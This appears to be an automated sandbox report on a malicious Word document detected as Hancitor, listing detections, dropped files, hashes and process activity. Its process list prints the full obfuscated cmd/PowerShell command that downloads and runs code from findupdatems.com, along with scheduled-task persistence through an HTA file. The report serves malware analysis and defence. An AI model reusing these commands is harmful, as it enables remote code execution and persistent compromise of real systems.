Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Diagnostics.Tracing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Diagnostics.Tracing.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behaviorgraph top1 signatures2 2 Behavior Graph ID: 64199 Sample: 18#U042f.doc Startdate: 17/11/2018 Architecture: WINDOWS Score: 100 46 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->46 48 Antivirus detection for submitted file 2->48 50 Multi AV Scanner detection for submitted file 2->50 52 8 other signatures 2->52 8 mshta.exe 2->8         started        11 WINWORD.EXE 428 29 2->11         started        process3 file4 54 Obfuscated command line found 8->54 56 PowerShell case anomaly found 8->56 14 cmd.exe 1 8->14         started        42 C:\Users\user\AppData\Roaming\WPFT532.hta, data 11->42 dropped 58 Document exploit detected (process start blacklist hit) 11->58 16 schtasks.exe 1 11->16         started        18 schtasks.exe 1 11->18         started        20 schtasks.exe 1 11->20         started        22 2 other processes 11->22 signatures5 process6 process7 24 cmd.exe 1 14->24         started        27 conhost.exe 14->27         started        29 conhost.exe 16->29         started        31 conhost.exe 18->31         started        33 conhost.exe 20->33         started        35 conhost.exe 22->35         started        signatures8 60 Early bird code injection technique detected 24->60 62 PowerShell case anomaly found 24->62 37 powershell.exe 14 29 24->37         started        40 cmd.exe 1 24->40         started        process9 dnsIp10 44 findupdatems.com 37->44

Simulations

Behavior and APIs

TimeTypeDescription
23:00:12API Interceptor3x Sleep call for process: WINWORD.EXE modified
23:00:15API Interceptor1123x Sleep call for process: splwow64.exe modified
23:00:34Task SchedulerRun new task: DriveCloudTaskCoreCheck path: mshta s>C:\Users\user\AppData\Roaming\WPFT532.hta

Antivirus Detection

Initial Sample

SourceDetectionScannerLabelLink
18#U042f.doc61%virustotalBrowse
18#U042f.doc100%AviraW97M/Hancitor.hwhzo

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
findupdatems.com0%virustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://findupdatems.com0%virustotalBrowse
http://findupdatems.com0%Avira URL Cloudsafe
http://findupdatems.com/check/index0%virustotalBrowse
http://findupdatems.com/check/index0%Avira URL Cloudsafe
http://findupdatems.com/ch0%Avira URL Cloudsafe
http://findupdatems.com/check/indexd0%Avira URL Cloudsafe
http://www.microsoft.c0%Avira URL Cloudsafe
http://findupdatems.com/check/indexHlj)4jzIEX$0%Avira URL Cloudsafe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

SourceRuleDescriptionAuthor
00000007.00000002.2369970087.058E0000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
0000000C.00000002.2380851729.06F8A000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
0000000C.00000003.2186142865.005BA000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
00000007.00000002.2365632769.00600000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
00000007.00000002.2365595933.005DE000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
0000000C.00000002.2374595497.00910000.00000004.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

Dropped Files

No context

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Startup

  • System is w10native
  • WINWORD.EXE (PID: 160 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\18#U042f.doc MD5: BFF948019509B5BF3F9B6CEED2E2B8E3)
    • splwow64.exe (PID: 3436 cmdline: C:\Windows\splwow64.exe 12288 MD5: 12431297FC2A420A47C367996ADB299F)
    • schtasks.exe (PID: 3240 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /F /SC DAILY /ST '10:20' /TN 'DriveCloudTaskCoreCheck' /TR 'mshta C:\Users\user\AppData\Roaming\WPFT532.hta' MD5: 22CFF8E0A49073A4C7A0A9BBADEF062B)
      • conhost.exe (PID: 4064 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: 66CC0EE1A55D150A84EF8D91D18B7C55)
    • schtasks.exe (PID: 944 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /F /SC DAILY /ST '10:20' /TN 'DriveCloudTaskCoreCheck' /TR 'mshta C:\Users\user\AppData\Roaming\WPFT532.hta' MD5: 22CFF8E0A49073A4C7A0A9BBADEF062B)
      • conhost.exe (PID: 3488 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: 66CC0EE1A55D150A84EF8D91D18B7C55)
    • schtasks.exe (PID: 1756 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /F /SC DAILY /ST '10:20' /TN 'DriveCloudTaskCoreCheck' /TR 'mshta C:\Users\user\AppData\Roaming\WPFT532.hta' MD5: 22CFF8E0A49073A4C7A0A9BBADEF062B)
      • conhost.exe (PID: 2168 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: 66CC0EE1A55D150A84EF8D91D18B7C55)
    • schtasks.exe (PID: 3512 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /F /SC DAILY /ST '10:20' /TN 'DriveCloudTaskCoreCheck' /TR 'mshta C:\Users\user\AppData\Roaming\WPFT532.hta' MD5: 22CFF8E0A49073A4C7A0A9BBADEF062B)
      • conhost.exe (PID: 3172 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: 66CC0EE1A55D150A84EF8D91D18B7C55)
  • mshta.exe (PID: 3684 cmdline: C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Roaming\WPFT532.hta MD5: 81FE91EE083E3D4B7404205A0F65E905)
    • cmd.exe (PID: 388 cmdline: 'C:\WiNDOws\sYsTEM32\Cmd.eXE' /c 'Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116, 114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 ,107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 ,120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 ,114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50, 43 ,91 , 99 ,104, 65, 114 , 93,49,48,54, 43, 91 ,99, 104, 65,114,93 , 49 , 50 ,50,41,44, 39, 124 , 39 ,41 , 124 , 32, 46 ,32 , 40 , 32 ,36, 69, 110 ,86 , 58,67 , 79, 109 , 83, 80, 101 , 99 ,91,52 , 44 ,50, 52 ,44 ,50,53, 93 , 45 , 106,79 ,73 ,110 ,39 , 39, 41)^| . ( $pshOme[21]+$PSHoMe[30]+'x') &&Set gnPq=ECHO inVOKe-ExPRessiON (get-ItEM eNV:AYw).valUe ^| pOWERsHElL -noPRoFI -EXEcuTiONpOlI BYPASS -noNi -NoeXi -WindoWStYlE HIdDen -&& c:\WiNDOws\sYsTEM32\Cmd.eXE /c %gNpq%' MD5: 7DB6A5CEEAC1CB15CF78552794B3DB31)
      • conhost.exe (PID: 3072 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: 66CC0EE1A55D150A84EF8D91D18B7C55)
      • cmd.exe (PID: 2176 cmdline: c:\WiNDOws\sYsTEM32\Cmd.eXE /c %gNpq% MD5: 7DB6A5CEEAC1CB15CF78552794B3DB31)
        • cmd.exe (PID: 240 cmdline: C:\Windows\system32\cmd.exe /S /D /c' ECHO inVOKe-ExPRessiON (get-ItEM eNV:AYw).valUe ' MD5: 7DB6A5CEEAC1CB15CF78552794B3DB31)
        • powershell.exe (PID: 2992 cmdline: pOWERsHElL -noPRoFI -EXEcuTiONpOlI BYPASS -noNi -NoeXi -WindoWStYlE HIdDen - MD5: 679D4A662B57B0079FBD409DAB6CC830)
  • cleanup

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\16BA40EB.wmf
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
Size (bytes):536
Entropy (8bit):3.2380644415242443
Encrypted:false
MD5:FB1B44BF2BBD22289ECFF500FDB031CC
SHA1:F72E63FFE2C469B6D6A95FB18868E11CB090DF7D
SHA-256:620B3828D0F4E45A629AEC0D8360DE0394C000736A2A17519FF1999EF1FB21C3
SHA-512:56F3053CA872224AE4CEFDB3D5EF72E314DE32783BA3671E3B4704666519E2C36D75BAB998077CF0C3B8C9E239F405CA80310134999CE4AF82B0BDB864D97845
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7C646412.wmf
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:Targa image data - Map - RLE 28 x 65536 x 0 +4 "\004"
Size (bytes):518
Entropy (8bit):3.383903515477388
Encrypted:false
MD5:DDD609CA4D3E5AC88131383EA62ADB01
SHA1:9D9FD86112D5373FB8A61B4382C70B939DE19698
SHA-256:31B6CBB8702E8B657358F1E2BA592D736C489DACCEAB4FF106AA7414409D7A9E
SHA-512:4C0731608F64B32903E6F23F80CC2AF02C3C5650015710B42B1B53EEBA4DCCEFD17E538DC43AA63B7B6F83F407CCAA22CC4FA3FE7A793AAA09E06E0AF021F479
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{67BFD83A-7D53-4A0F-96F3-6126AAF41C28}.tmp
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Size (bytes):1024
Entropy (8bit):0.05390218305374581
Encrypted:false
MD5:5D4D94EE7E06BBB0AF9584119797B23A
SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:false
Reputation:high, very likely benign file
C:\Users\user\AppData\Local\Temp\Word8.0\MSForms.exd
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Size (bytes):182128
Entropy (8bit):4.351760641642343
Encrypted:false
MD5:F4840528D4C9A4A8D86816AE628E6935
SHA1:5217B8F2BB06F92BF10D863B2854EBD98AC5DE74
SHA-256:DA57CC876B21ED3A32662CA28B89ACCA8245B32AEA6ABBCDE928E155BD874E09
SHA-512:82A2F44540E722C672ED4BB23AD8DC108FB0B97BD2E64CE65BBBB839C8270E5D3FA983550429F10F53E64CE42D8587DF594190A96E53D279A4D9F9D65345EC59
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Temp\oxmpyhoh.ds1.psm1
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Reputation:high, very likely benign file
C:\Users\user\AppData\Local\Temp\t0urd0ar.ex0.ps1
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Reputation:high, very likely benign file
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\18#U042f.LNK
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Nov 18 04:59:52 2018, mtime=Sun Nov 18 04:59:52 2018, atime=Sun Nov 18 06:00:08 2018, length=131584, window=hide
Size (bytes):2082
Entropy (8bit):4.572413524432544
Encrypted:false
MD5:F7EAE5D21D478BEF830F7D1E49CDBFB8
SHA1:8C75EEE3C27A7A369D1D0B8E8B5D76A07C7D9916
SHA-256:52A01BA976FC2AEC8C611CD96D5FAF3BE56170E366A8EB90C47D747FE4F3FCCB
SHA-512:DBA8E7FFE36F040B2BA9C7234FE04E0CE75A7B65AE0C3039C3AFEE83111E78BE5A6931AC68F5FCEC4116351A0CFF5E547B6CF1E027CDB1DEA73F94CC842319C0
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:ASCII text, with CRLF line terminators
Size (bytes):50
Entropy (8bit):4.468758439731453
Encrypted:false
MD5:AD9CD94FEC606750D4015B22E5A67046
SHA1:FCB0F46C12DF8F856BEFBC1892205CA969A7D1E5
SHA-256:6F862A8A7464CFD9C1082ABE28C497A8517EF435F2BD6B0388FAE821ADED695F
SHA-512:2333302A02E4E0C98E81DCB05CBE2F96D772C1C7BF6FA47E23867FA30BE78E9B403258409066C3C4B7B32856A0221C69178C66FAA735D9AC6129D755ABC23024
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Size (bytes):162
Entropy (8bit):2.3133188038020394
Encrypted:false
MD5:6226AAF0237B835C24E6DAB3777B1D48
SHA1:826041D9EBDDC1DD5CBF6FC6203A89FC4C85334C
SHA-256:A91E0190F6D141A229D6D65C36084177D0EB46FFAF0E93A36154A647344015C0
SHA-512:8BA3D4CF485F2BE3F9B60B12966E67313317D4BEA08A3A70BEC97A2DAF01DFC551CAB2B948DE7E0D195EE7593451D3A77E0321D1715400665D7F6532FEB18639
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\WPFT532.hta
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Size (bytes):11132
Entropy (8bit):5.596550497168792
Encrypted:false
MD5:B5A838205233073A8F5A9D765FD39458
SHA1:D6E1B47A69272F7A02994E0856636F477F053015
SHA-256:3E5DB0BE876EAECC72D3A5ADD0247B3A09401D4C621C8A8C15E0E7E011C7DC10
SHA-512:1B09E622B74588C76BBA0063A5889256729D35F7C044F4D3701709D17470D6BA86438D0E04C351752077B135AC326465330BC8B8912723F3285F85BDBA53D110
Malicious:true
Reputation:low
C:\Users\user\Desktop\~$#U042f.doc
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Size (bytes):162
Entropy (8bit):2.4150112901152436
Encrypted:false
MD5:188F59AE1ABF5A0908FE4DAE9BF9A2E4
SHA1:4E5341C55F2010537916707E4244140A05810360
SHA-256:AA2B32A9A09AC4FD52AD0786B3E6F938E1A6881CA58B0AA9C7AC3B9B2CB397BA
SHA-512:D1978A4B3A14DA75622C98134A86B42913AED63DDDCEB905E8EF0B8F64268760912E1304EF7281EA2699E3D4E2ECDB7D51969C1CF7C770E44802D445EA05F5D4
Malicious:false
Reputation:low
C:\Users\user\Documents\20181118\PowerShell_transcript.424505.Y2llNals.20181118102015.txt
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
Size (bytes):2794
Entropy (8bit):5.38098391651746
Encrypted:false
MD5:DF74055CEF4A80165050A50B9112D051
SHA1:2967BD03832832FEBE44B5788833FFD24A8EA2E8
SHA-256:4E93D25529702BF18F1CF72EA13D03DE8ED5BA3EFDA6AAF2AC4D3C52A387CC9C
SHA-512:FFB95DC76C44FC3559169472C20A0B43FB58456A219EED74D514BDB61C454F0A71A5A893BEAF5C27922EF223598541D787C6CD78AE885F2C007C89F3817697F7
Malicious:false
Reputation:low

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
findupdatems.comunknownunknowntrue0%, virustotal, Browseunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
